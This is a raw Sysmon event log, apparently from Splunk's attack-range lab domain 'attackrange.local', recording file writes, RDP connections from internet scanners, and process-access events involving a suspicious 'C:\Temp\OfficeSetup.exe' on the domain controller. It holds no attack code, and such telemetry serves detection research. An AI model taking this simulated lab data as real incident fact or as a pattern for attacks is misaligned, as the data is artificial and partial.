Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDDE84F55F0CD115D44D865844B346EF,SHA256=11C1F5C83A060E3E0396457323A23501D997D96BEC2400BBDE6D8D2A266DAC18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:23.863{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64A26F2B6B726FD41F2F8A37A3FAE06D,SHA256=7EC121B799CB90D4B3AADAD5D99040240E808DD615C75313DAD04594BFC9B450,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:22.134{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-40473-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:22.099{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-37741-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000062952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:23.410{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:24.894{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40A12471B64900D88C48132807020F46,SHA256=B0A9AACD6BF87C98B34BB9330A5FC44A37D1D975A8B255B03B3358A8876CC141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049251Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:24.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=202D37F38C928493336C8C623088F4A8,SHA256=5D5442343E5F07B0E44FF16254CB091FB125A4596B524C488D2F7398A5070F24,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:23.559{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-41839-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049250Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:24.172{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=882E24EB534CB472AF29B2A82C4BED1F,SHA256=C938D33F49A8C6B6D102DFF597EEF7FCFAE165C5601DE96C102BDF0BAFFB469A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049249Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:21.287{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60878-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:25.910{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88F7BB7B5B4AD8B002A802EC326A84D8,SHA256=6200083C264C904F2D89AD2981CE1B34A5E957C5989DF20810B9F50B77692DA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049254Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:25.500{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC683828D90E775D23867495352B2574,SHA256=310DC12A3F5727BBDD1D96D35BD01FBEAD7CE2D776D0310845C8AB9D69CA07A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:25.363{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B190CBDEB7CB9959F4E43418C70C8294,SHA256=1009A47A6CDDA6D9C9EE99A5AC211B290B2B6C65F6984DD8547D58BC00D89A6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049253Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:23.250{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52470-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000049252Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:22.813{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62369-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:26.941{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D36BB6308A1BA40EDE3CBA89AC7364,SHA256=68BA7B322F459278328FCC88F57F086230BE4D40164C21DBAB7B9278E196CDA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049256Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:26.504{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=121ACED8DDAF14A82F7ED65936879D26,SHA256=208D33D286E2F512448197A5C8915C59A196A2AD3E9457ADC3E2DD78430B5DDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:25.116{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58138-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049255Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:23.764{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55558-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:27.941{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B717C87BAEB5557067B26825CBAABF2,SHA256=80782584B609A5AE1D5CA337D0086E1076139A10D6BD66C7685F005CB4C75219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049260Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:27.536{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BCD6B066E3C822A3E6765F552DA4B44,SHA256=DE3E466D2CB50060C05D527BC4B10A5C1531D3C6C1A9F44DDE231AC12838564D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049259Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:27.536{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96FF2CE5C5D853BFF891479643CF1B2C,SHA256=FC9C9962C170EB1AFADD7F27A022FBB92762F118C5ED8692EA575C29B168E3D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:26.656{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44571-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:26.170{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57443-false10.0.1.12-8000- 354300x800000000000000062964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:26.161{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50677-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:27.207{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19043B685985F3324C6BEABA1B77CADC,SHA256=06887B14F7BE5AE02676F41E1BAA45F537AC8CDFFA93FCEC16E3FBD78ED439A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049258Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:24.844{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52471-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049257Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:24.499{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63850-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:28.988{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AFA2C767A148976A619BBF157BAD11F,SHA256=F6E40B97D4D6AFBB9A2AFDBE042B1353529E5B69955FF6CC8DB522A3E787F267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049263Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:28.551{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0991F55132930E791095AF6E962C8ED,SHA256=F66B9B3E10BDB795B93FC40F03BCAF0278B7F11810752CAA56ADBB468892AA7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:28.441{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22D297C74B0E26775484B637292D53D1,SHA256=525AA233B587D655CCB613BBD2E3F2B1AB4A1A67D42DC3D35A57E505B909814C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049262Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:25.955{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65325-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049261Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:25.950{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50919-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049265Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:29.582{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FD861E1CB72DA43FBC38ED35FF01182,SHA256=2A35ECE0922933E07B9D415902F51140CF4BA809C2E6D24E5C7162385BE384AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:28.150{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43205-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:29.629{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92AB14AE9A1A6C0AF194ABB6F9424542,SHA256=4B9F27F59DF1559726AB02FA7779F338DA8C51BEA756910C6F73BBD5048FD452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049264Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:29.192{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF2D4A0C554A8F63EF6CCB65F00506B9,SHA256=B1CCE1125312B36E9D631671C0E58C60F798ED63AFC1ACF03E1E6C06760A581C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049266Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:30.645{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A14F639A11D46DFEB58BAC2596C121DF,SHA256=E10DC70A29BFB2CD82C2E2580EB28A53EFAEB38276447392EC0F39A830766EA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:29.574{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47304-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:29.239{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60972-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:30.004{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9EAE21B9323E03BF9D728D3EB00CCB4,SHA256=51FDEA2CB0F2F742B80C1E1C745A1F67DDEF35C6A635EB6FCC5F6AA0B87ED056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049267Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:31.661{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C66D923C0F9839E14986050EBD5F54C3,SHA256=6289703E72D3C17606EE24D809CE2D5B47BBE6FBA38B725B413FAFFFDE49A716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:31.222{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B98D71F32F6E1E0B9ED754142993B6CD,SHA256=DB24AD70422C4E060EBCA2C89B41EBD21060B3BAC77DF9551EE3311F9AFF4927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:31.082{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97BB770AE70338C38F3D0B3C4FEF6A2D,SHA256=6E82BBB9DF85962697BA0359C640EF8B6297F44D6F0A5D214075AD6B4FF3136C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049271Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:32.801{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E76AAF60F3681B5B36B461D119DB91B0,SHA256=594E25AB56F320C3EB8D5008A427E2FA747052315E8E90EEF7B6A3EBA6199560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049270Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:32.692{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE86F04CB9AC8A94E5A319F6227BABD,SHA256=DC1B4D2D9B674DC36D11A6580DD32D068BFE2A6574069DD6B156D85362AD638A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.894{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.878{A7A01FEF-B626-607E-1600-00000000BB01}15402060C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.878{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000062987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDBSetValue2021-04-20 14:53:32.550{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\OfficeSetup.exeBinary Data 10341000x800000000000000062986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-B626-607E-1300-00000000BB01}12641420C:\Windows\System32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:32.550{A7A01FEF-B626-607E-1300-00000000BB01}12641420C:\Windows\System32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 